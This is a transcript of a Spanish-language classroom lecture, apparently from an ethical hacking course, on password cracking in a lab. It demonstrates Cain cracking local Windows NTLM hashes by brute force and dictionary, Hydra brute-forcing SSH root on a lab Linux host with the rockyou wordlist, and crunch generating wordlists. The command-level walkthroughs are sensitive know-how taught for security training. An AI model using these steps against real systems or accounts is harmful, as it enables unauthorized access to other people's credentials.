hash desde el sistema local. Importar hash desde un archivo de texto. ¿Sí? Si hubiéramos jalado los hashes desde allá, desde el archivo, perdón, desde el hashdom, pues lo volcamos en un archivo de texto y aquí lo podemos incluir. O importar desde alguna base de datos de SAM. Pero si lo vamos a importar desde una base de datos de SAM, hay que traerse el archivo de SAM como tal y hay que traerse el syskey que se calculó al inicio de la, ¿cómo es que se llama? De la conexión del net hashdom. Entonces vamos a traernos los que están aquí en la máquina Windows. Entonces vamos a decir aquí, importar hashes from local system. Esto del histórico de los passwords, pues no me interesa, señores. Ahora mismo. Vamos a decirle next.
y esperamos a que cargue los usuarios. Listo, aquí cargó los usuarios completos. Miren, nos identificó que este usuario administrador no tiene contraseña. Nos identificó un usuario invitado también sin contraseña. Aquí están los LM-hash porque están todos iguales, ¿sí ven? No se están utilizando ahora mismo para la autenticación. Y aquí están los NTL-hash. No sé por qué aparecen unos para esto, pero el password está vacío. Muy bien, entonces aquí hay diferentes técnicas que se pueden utilizar para obtener las credenciales. Vamos a probar lo que es la técnica de fuerza bruta y lo que es la técnica de ataque de diccionario. ¿Oyeron? Entonces, si ya les sacó la lista de los usuarios, vamos a seleccionar al usuario María. Porque vamos a trabajar con él. Esta herramienta es mucho más sencilla porque es todo gráfico. ¿Oyeron? Entonces, ¿qué vamos a trabajar? Pues vamos a trabajar con el craqueador respectivo de lo que detectó. Él detectó 8 usuarios con hashes LM y NTLM. Así que tenemos que trabajar con ellos. ¿Ya ven? Entonces podemos coger aquí, clic derecho, ataque de fuerza bruta de tipo NTLM hash. Entonces, como habíamos dicho anteriormente, un ataque de fuerza bruta, ¿cuál es? Es ese ataque que tú comienzas a probar hasta dar con la herramienta, con la contraseña, perdón. Entonces, aquí tenemos un conjunto de caracteres predefinidos, ¿sí? Símbolos especiales, ya, lo que queremos probar, solamente letras mayúsculas, mayúsculas y números, mayúsculas, números y símbolos, todos estos símbolos en particular. Aquí nos da el espacio de llaves, de claves, de intentos que puede utilizar. Un valor bastante grande. Solo números. Entonces ya tú escoges cómo quieres o cuál técnica quieres utilizar. Y acá, o si quieres acá, pues defines un manejo personalizado tú mismo. Tú dices, no, solamente las letras A, aquí dices tú, no, solamente estos caracteres y estos números, por ejemplo. ¿Right? O incluso le puedes poner, no, yo tengo más o menos, yo sé que tiene un asterisco por algún lado. Sé que tiene un paréntesis. Bueno, un paréntesis. ¿Ya? Entonces ahí van. Para no demorarnos tanto aquí, vamos a colocar la opción que dice minúsculas y números. Porque yo sé que eso solamente tiene minúsculas y números. Y vamos a bajarle aquí esto a 8 caracteres. Para que no se demore tanto, digamos que no haga tantos intentos con muchos caracteres. Sabemos que la contraseña es sencilla. Obviamente, señores, si la contraseña es más compleja, es muy probable que el ataque se demore demasiado y es posible que hasta ni funcione. Porque no sé exactamente cuántos caracteres tienen y cosas por el estilo. Entonces, yo le voy a decir aquí Start. Y él va a comenzar a intentar con diferentes opciones. Él aquí me muestra algunos de los passwords que está probando. Con combinaciones de letras y números. Dice que puede durar 2 días y 2.8 días, 2.9 días en obtener la credencial. Esperemos que no demore tanto. A mí me salen 23 días. Bueno. Tienes una máquina muy lenta. ¿Sí se dieron cuenta que allá fue más rápido en la página? ¿Pero por qué? Porque allá él no está probando conectarse, él no está probando obtener el hash. Él lo que está probando, allá lo que se hizo fue buscó ese hash en una lista arcoíris, ¿verdad? En una tabla arcoíris, él lo encontró y listo. Aquí, esta es la clave que se asoció a esa contraseña, a ese hash que es ADM123.
Si se dan cuenta, él parece que probara de forma aleatoria, ¿no? Bueno, listo. Aquí tenemos la contraseña encontrada. La contraseña es ADM123. ¿Saben? Entonces, esa, si se dan cuenta, es la misma contraseña que se obtuvo de aquel lado con el sitio web de CrackStation. ¿Saben? Entonces, listo. Ahí tenemos ya una obtenida. Ahora pudimos haber hecho el barrido con todas las cuentas para tratar de obtener todas las credenciales, ¿no? Y ahí está. Ya encontró esa, ya está listada aquí. ADM123. Ahora, con el usuario Pedro, vamos a aplicar una técnica de diccionario. Entonces, vamos a hacer el ataque por diccionario en este caso. Entonces, vamos a tomar el usuario Pedro, clic derecho, ataque de diccionario y lo mismo de tipo NTLM hashes. Muy bien. Entonces, el ataque de diccionario, como ya lo habíamos explicado, se basa en que tú tienes un archivo de texto con una lista de contraseñas o incluso puede ser hasta de usuarios si el sistema lo soporta, para tú comenzar a probar con esas posibles palabras que tienen esos diccionarios. Obviamente, entre más grande sea el diccionario, más probable es que sirva para utilizar la contraseña. Y déjenme decirles, señores, que hay diccionarios que pesan varios gigas. Archivos de texto que pesan varios gigas y que contienen una gran cantidad de claves. Entonces, lo que tenemos que hacer, si no está seleccionado, es añadir aquí, clic derecho, Add to List, y añadimos el diccionario de claves. Ya que Caín tiene una lista aquí de claves, un archivo llamado word list, que vamos a abrir, y que está en la carpeta del propio Caín, en la carpeta de word list. Y ese es el que vamos a utilizar para tratar de obtener las credenciales. Y aquí están las opciones, digamos que, sí, como un password entre paréntesis, no sé, bueno, con P mayúscula, o sea, como combinar mayúsculas con minúsculas, invertir palabras que están en el diccionario, que si está la palabra password, pues voltearla, repetir las palabras, pas, por ejemplo, poner todo en mayúscula y minúscula, mayúscula sostenida, manejar secuencias de números, miren, reemplazar vocales por números. Case también tiene que jugar con las mayúsculas y las minúsculas, intercalarlas. ¿Ya? Y números, dos números híbridos en fuerza bruta. PAS 00, PAS 99, por ejemplo. O sea que todas las contraseñas que él tiene listadas en su archivo les agregue estas otras posibilidades para el escaneo la obtención, perdón, de los números. Entonces le vamos a decir Start. Y nuevamente toca esperar. Aquí están los passwords que está probando. Listo. ¿Ya? Obviamente para que funcionara rápido yo le puse unas contraseñas que fueran fáciles de encontrar. Y aquí está QWERTY. Esta es la clave que se encontró dentro de para ese usuario, asociado a ese hash. ¿Ven? Entonces, un ataque de diccionario que encontró la contraseña que estaba usando ese usuario. Decimos exit, y listo. Ya están aquí las credenciales. Entonces, así se pueden obtener las credenciales de los diferentes usuarios. Vamos a mostrarles aquí, por ejemplo, el diccionario. Entonces, aquí tenemos en la carpeta del disco C, perdón, la carpeta de archivos del programa X86, Cain, WordList, y ahí está el WordList. Vamos a abrirlo. Y aparecen estos caracteres. Este es el diccionario. Miren. Tiene una gran cantidad de palabras. Palabras incluso extrañas que de pronto pues se generaron de manera aleatoria, están muy parecidas, o
que fueron obtenidas de algún lado. Estas me parece que fueron generadas de manera aleatoria o basadas en unas combinaciones especiales. Pero entonces este es el Word. Miren, Oracle, Oracle 8, Oracle 8i, Oracle 9, Oracle 9i. ¿Ya? Bueno, estas son las actividades de password cracking con la herramienta Cain. Entonces, ahora vamos a apagar la máquina Windows, porque por hoy ya terminamos con ella. Y vamos a pasar entonces a lo que es la máquina Linux y la máquina Kali. Bueno, entonces aquí tenemos nuestra máquina Windows. Vamos a verificar que los servicios que tenemos configurados en la máquina estén corriendo. Vamos a probar el servicio Apache primero. Service HTTPD status. Ahí dice que se está ejecutando. Miren que en Kali se llamaba Apache 2. Acá se llama HTTPD. Eso es pues común. Tienen diferentes enlaces. Service MySQLD status está corriendo. Service SSHD status también está corriendo. ¿Listo? Aunque eso lo pudimos detectar también con el Nmap en nuestro sistema. Entonces, vamos a verificar la dirección IP de esta máquina. Le decimos if config y listo. A mí me está arrojando una dirección 192.168.1.124. ¿Listo? Entonces con esto ya yo puedo comenzar a trabajar con la máquina Kali para tratar de averiguar la información o haber notado, por ejemplo, en el scanning que teníamos unos servicios que eran el servicio MySQL y el servicio SSH, que eran servicios autenticados. Entonces, vamos a pasarnos a nuestra máquina Kali y vamos a abrir la consola para correr otra vez la herramienta Nmap y detectar nuevamente estos servicios. Entonces, vamos aquí a la consola. Vamos a maximizar un poquito aquí, a ampliar el tamaño de la letra. Y vamos a correr nuevamente. Vamos a repetirlo para recordar de dónde tuvimos esta información. Entonces le decimos nmap, por ejemplo, le decimos -a mayúscula y le decimos la dirección IP 192.168.1.124, que es mi caso acá con la máquina Linux. Enter. Y ahí toca esperar un rato a que nos detecte nuestros servicios en esa máquina. Listo, ya aquí terminó. Y obtuvimos, por ejemplo, que tenemos el servicio SSH habilitado en el puerto 22 con la versión 2.5.3. Tenemos abierto el puerto 53 DNS, la versión 982 RC1 y el Red Hat 6. El servicio web, Apache, el servicio MySQL, ¿sí? Me detectó la versión de MySQL 5.1.73. Eso quiere decir que él tiene habilitado la opción de conexión. Detectó habilitado el sistema SALT para el manejo de las contraseñas, así como les expliqué, que con un valor adicional por aparte. Entonces lo que me interesan son los servicios que tienen autenticación de manera remota. Por ejemplo, el servicio SSH. ¿Ya? La idea es tratar de conectarme remotamente con esa máquina y tratar de obtener la credencial del usuario para establecer dicha conexión. Entonces, yo voy a probar establecer la conexión con SSH, ¿verdad? Les voy a mostrar cómo se hace y después vamos a hacer un pequeño reto para que ustedes intenten detectar
MySQL como tal y me hagan alguna, digamos que me dejen alguna evidencia en ese servidor, me tienen que mandar la foto de que lograron ejecutar dichas actividades y de que lograron crear un usuario, crear una base de datos, una tabla, no sé. Ya ustedes verán a ver qué evidencia me dejan. Entonces, la herramienta que vamos a utilizar se llama Hydra, digámoslo así en inglés. Entonces, básicamente esto lo que hace es intentar establecer muchas conexiones contra una máquina para tratar de obtener la credencial que nos permita romper la seguridad de ese sistema. Entonces, ya tenemos la dirección IP, ya sabemos que es SSH y el MySQL. Entonces, lo que vamos a hacer es decir, Hydra, que es la herramienta, recuerden ponerle el sudo, ustedes allá. El parámetro -L es para darle el nombre del usuario, que en nuestras máquinas Linux sabemos que el administrador pues es el root. Le decimos -P para probar con una posible contraseña, ¿verdad? Pues ya sabemos que esa contraseña es monkey. Vamos a probar con otra contraseña distinta. Vamos a probar con system, por ejemplo. Y le decimos la dirección IP de la máquina. 192.168.1.124. Y le damos Enter. De esta manera estamos probando conectarnos con ese servicio. Ah, perdón. Y falta el servicio SSH. O sea, decirle que vamos a trabajar con el servicio SSH o con el puerto 22. Entonces, le damos Enter. Y nos dice, nada, lo siento mucho, pero esa contraseña no sirvió. Entonces dices tú, bueno, probemos con otra, pues. Flecha arriba. Vamos a probar con Monkey. Porque ya tú tienes unas ideas de que eran más o menos esas claves. Le damos Enter. Listo. Ahí fue satisfactorio. Demostró que esa sí era la contraseña. ¿Okay? Sí es el usuario root y el password monkey. Esa es la clave de esa conexión. Ay, qué ciencia, ¿cierto? Comenzar a probar claves. No tiene mucha aplicabilidad, nos demoraríamos demasiado. Pero el sistema también puede trabajar con un diccionario de claves, e incluso con un diccionario de usuarios también. Ahora, tengo que tener el diccionario. Ya la herramienta Kali tiene un archivo de contraseñas, ¿sí? Un archivo ya listo que se llama Rockyou. ¿Dónde lo encontramos? Pues sencillo, va a estar en la carpeta de user share, vamos a buscarlo. ¿Sí? Decimos aquí cd /usr /share /wordlist y en esa carpeta de recursos compartidos está un archivo de contraseñas. Si le damos un ls, aquí está el archivo rockyou.txt.gz. Ese archivo es el archivo de las contraseñas que está comprimido. Vamos a sacar una copia y me lo voy a llevar a mi carpeta. Voy a decirle, la copia se saca con el comando cp, que es copiar. Entonces, cp rockyou.txt.gz, asegurándome de no equivocarme en ningún lugar. Si presiono la tabuladora, él me completa si él puede identificar ya la palabra exacta de mi archivo. O sea, yo puedo tener, por ejemplo, ese es el único con R. Entonces yo le digo cpr tabuladora y enseguida él me completa todo el nombre de una vez. Y le voy a decir, yo le tengo que decir root. Listo, ya lo debió haber copiado. Muy bien. Entonces, en este caso,
me voy a devolver a mi carpeta. ¿Cómo me devuelvo a mi carpeta? Todos lo podemos hacer. CD Enter. Y si me aparece la virgulilla, la tilde esa de la ñ, ya estoy en mi carpeta personal. Si me aparece algo distinto, estoy en otra carpeta diferente. No estoy en la de mi usuario. Es más, con el comando ls, yo puedo verificar que ahí está el archivo. Y ahí está. Rockio.txt. Aquí está. Entonces, señores, lo que vamos a hacer ahora es descomprimir ese archivo. Este no está comprimido con zip, sino con gzip, que es otra herramienta. Entonces vamos a decirle g-unzip para descomprimir el archivo, que es rockqtxt.gz, porque está comprimido y necesito descomprimirlo. Entonces con la herramienta g-unzip puedo hacer esta descompresión. Le doy Enter. También lo podría hacer con gzip espacio -d. Y listo. Si le doy un ls, ahí está el archivo vacío. Perdón, el archivo descomprimido ya. Fíjense que el archivo anterior ya no aparece. Porque ya fue descomprimido. Entonces yo le puedo decir, por ejemplo, cat rockqtxt para ver el contenido. Y ahí vienen todo el montón de contraseñas que están pasando. Ese archivo tiene un total de 14.344.392 contraseñas. Obviamente, pues, según la versión de Kali, de pronto podría variar. Y listo. O sea, están todas las posibles contraseñas que él tiene registrados en su sistema. Muy bien. Entonces, vamos a utilizar el mismo comando Hydra que usamos ahorita, pero vamos a cambiar un parámetro. En vez de poner aquí la contraseña exacta que quiero probar, voy a colocar aquí una P mayúscula, ya no minúscula, sino mayúscula. Cuando la P es mayúscula es porque me voy a basar en un archivo de contraseñas. Voy a llamar al archivo rockqt. La misma IP y el mismo servicio. ¿Vieron? Entonces, si ya escogimos todos los parámetros correctos, la P mayúscula, ojo, P mayúscula, porque si es P minúscula, probamos como si la clave fuera rockqt. Y en este caso le damos Enter y él va a comenzar a probar con diferentes contraseñas, con las que están guardadas en el archivo. O sea que esto es un ataque de diccionario. Listo, ahí la encontró. Y ya, ahora sí, basado en el ataque de diccionario. Entonces encontró la contraseña root y el password monkey, un password válido encontrado. Digamos que lanzó 4 hilos de procesos para poder correr la tarea, que es máximo 16 tareas para un solo servidor. Y pues obtuvo la credencial. Perdón. Ahí está. Con "-c" mayúscula le dices un archivo de usuarios también, si quieres probar con múltiples usuarios. Con Q me salgo. Con "-o" yo puedo sacar eso a un archivo para que me quede registrado en un archivo cuando hago varios intentos. Lo que vamos a ver ahora para terminar la clase de hoy es cómo crear nuestro diccionario. ¿Listo? Para eso hay un comando que podemos utilizar que es el comando crunch.
Esta herramienta Crunch es una herramienta que nos permite crear un archivo de diccionario basado en unos patrones o unos parámetros que yo le diga. Es sencillo de utilizar. Simplemente le digo Crunch, la cantidad mínima de caracteres que voy a asignar. Por ejemplo, 2. La cantidad máxima de caracteres que voy a asignar. 3. Para que no me demore mucho. Los posibles caracteres que voy a utilizar en esas combinaciones. Entonces tenemos, por ejemplo, ABC. Y dónde quiero guardar ese archivo. Para eso uso el parámetro -o y le doy nombre al archivo. Le voy a poner password.txt. Entonces me va a comenzar a hacer combinaciones de las letras A, B y C desde 2 caracteres hasta 3 caracteres. Listo. Me generó 36 líneas, o sea que me generó 36 caracteres diferentes, combinaciones de caracteres con las letras A, B y C. Si le digo, por ejemplo, cat password.txt, bueno, veamos que esté ahí, ahí está, ls, ahí está password.txt. Si le digo cat para ver el contenido, ahí está, ¿sí ven? Letras AA, AB, AC, BA, BB, o sea, ahí están todas las combinaciones de 2 caracteres y todas las combinaciones de 3 caracteres. Entonces yo puedo crear mi propio diccionario aquí. ¿Sí? ¿Basado en qué? Ese es un diccionario creado por fuerza bruta. Combinaciones de caracteres por el conjunto de caracteres que yo les diga. Ahora, hay un detalle particular. Digamos que estos archivos generan, miren cómo por solamente usar de 2 a 3 caracteres, se me generaron 36 líneas, 36 contraseñas diferentes, ¿verdad? Entonces, para generar un buen archivo de contraseñas, señores, se va a consumir bastante, digamos que bastante contenido. Así que hay que tener mucho cuidado. A veces uno se pone ambicioso y no tiene muchos recursos de disco y el archivo crece demasiado. ¿Ya? Yo puedo basarme en un archivo. Voy a mostrarles el contenido de este archivo. Usar el editor V. No, vamos a usar Nano para evitar que, si ustedes lo hacen, se les vuelve un arroz con mango salirse después de ese editor. El editor V se los recomiendo, es excelente, pero es bastante complicado de manejar. El archivo es USR, está en USR Share, ahí mismo, en la carpeta Crunch, y el archivo se llama charset. Charset.lst. Son ya un conjunto de caracteres ya definidos para generación de estos archivos de contraseñas. Si le damos Enter, aquí están los nombres que tiene cada función y los caracteres que se pueden utilizar aquí. Por ejemplo, caracteres hexadecimales en minúscula, caracteres hexadecimales en mayúscula, números, número y espacio, símbolos, símbolos y espacio, todos los símbolos, ¿sí? Entonces ya aquí hay unas definiciones de, miren, mayúsculas con símbolos, mayúsculas con números, minúsculas con símbolos, minúsculas con números, ¿sí? Mayúsculas y minúsculas, caracteres de suecos, ¿sí? Con símbolos, miren las tildes estas que están acá arriba. Entonces ya estos nombres que están aquí se referencian para las variables, para los caracteres estos que están especificados acá. Entonces yo le puedo decir al sistema que me cree un diccionario basado en algún conjunto de estos caracteres, que ya sería pues un diccionario mucho más profesional, por así decirlo. ¿Saben? Entonces,
Por ejemplo, vamos a probar a ver qué nos pasa. Con control X me salgo. Vamos a probar a ver qué pasa, señores, con este comando. Vamos a hacerlo incluso que comprime enseguida. De 4 a 5 caracteres nada más, para que no se nos arme demasiadas combinaciones, ¿verdad? Y le vamos a decir que se va a basar en un archivo. Entonces yo le digo "-f". ¿Cuál archivo? Pues ese que definimos ahí, ¿no? /usr /share /crunch y charset.lst. Y le decimos, por ejemplo, que va a trabajar con el parámetro L-alfa para decir los caracteres alfanuméricos, alfabéticos en minúscula, numeric, que es como se llamaba uno de los patrones que aparecían ahí, que utilizaban solamente letras y números en minúscula. -o, para que el contenido me lo guarde en un archivo, voy a ponerle word list, ¿sí? Lista de palabras, .txt, y adicional a eso, le voy a colocar un parámetro -z para que me lo comprima con gzip. Listo, le damos enter y a esperar, señores. Listo, ahí le dimos enter y nos está indicando que van a generarse 62.145.792 líneas, señores. Vamos a ver cuánto nos demora eso. Muy bien, ya terminó. Ahí tenemos el archivo wordlist con un... aquí está, wordlist.txt.gz. Ahí lo tenemos comprimido, ya lo podemos hacer, puede hacer parte de nuestros archivos ya de claves. Pues pesa, vamos a ver, según esto el archivo iba a pesar 353 megabytes. Vamos a decirle ls-l para que nos dé una lista detallada y nos diga cuánto pesa el archivo. wordlist.txt. Vamos a decirles la letra H para que nos lo muestre en formato humano, ¿sí? O sea, más fácil de leer. Y dice que pesa 132 megas porque está comprimido. O sea que tuvo una razón de compresión del 62.8% según lo que dice el sistema. Bueno, descomprimámoslo pues. Así como hicimos con el anterior. g1zip y el wordlist.txt.gz. Muy bien, le decimos aquí un ls y ahí está wordlist.txt. Bueno, veámoslo con el comando cat. Y ahí están los caracteres, que se están creando desde el 4 con todas las posibles combinaciones de 4 y 5 caracteres con mayúsculas, minúsculas, perdón, mayúsculas y números nada más. Minúsculas y números, disculpen. Vamos a cancelar. Entonces, ahí así podemos generar, señores, nuestros archivos de contraseñas. Entonces, señores, con eso terminamos el tema de la clase de hoy. Ya vimos, pues, lo que es las técnicas, algunas técnicas para password cracking, para romper la seguridad
de las contraseñas, unas de manera local, otras de manera remota. Ya las de manera remota es porque el servicio así lo permite. En Windows ya vimos que con Hydra podríamos haber intentado hacerlo por escritorio remoto para ver si de pronto llegábamos a obtener algunas claves de estos usuarios. Entonces, con eso terminamos el tema de la clase de hoy, señores. Ya nos veríamos en la próxima clase.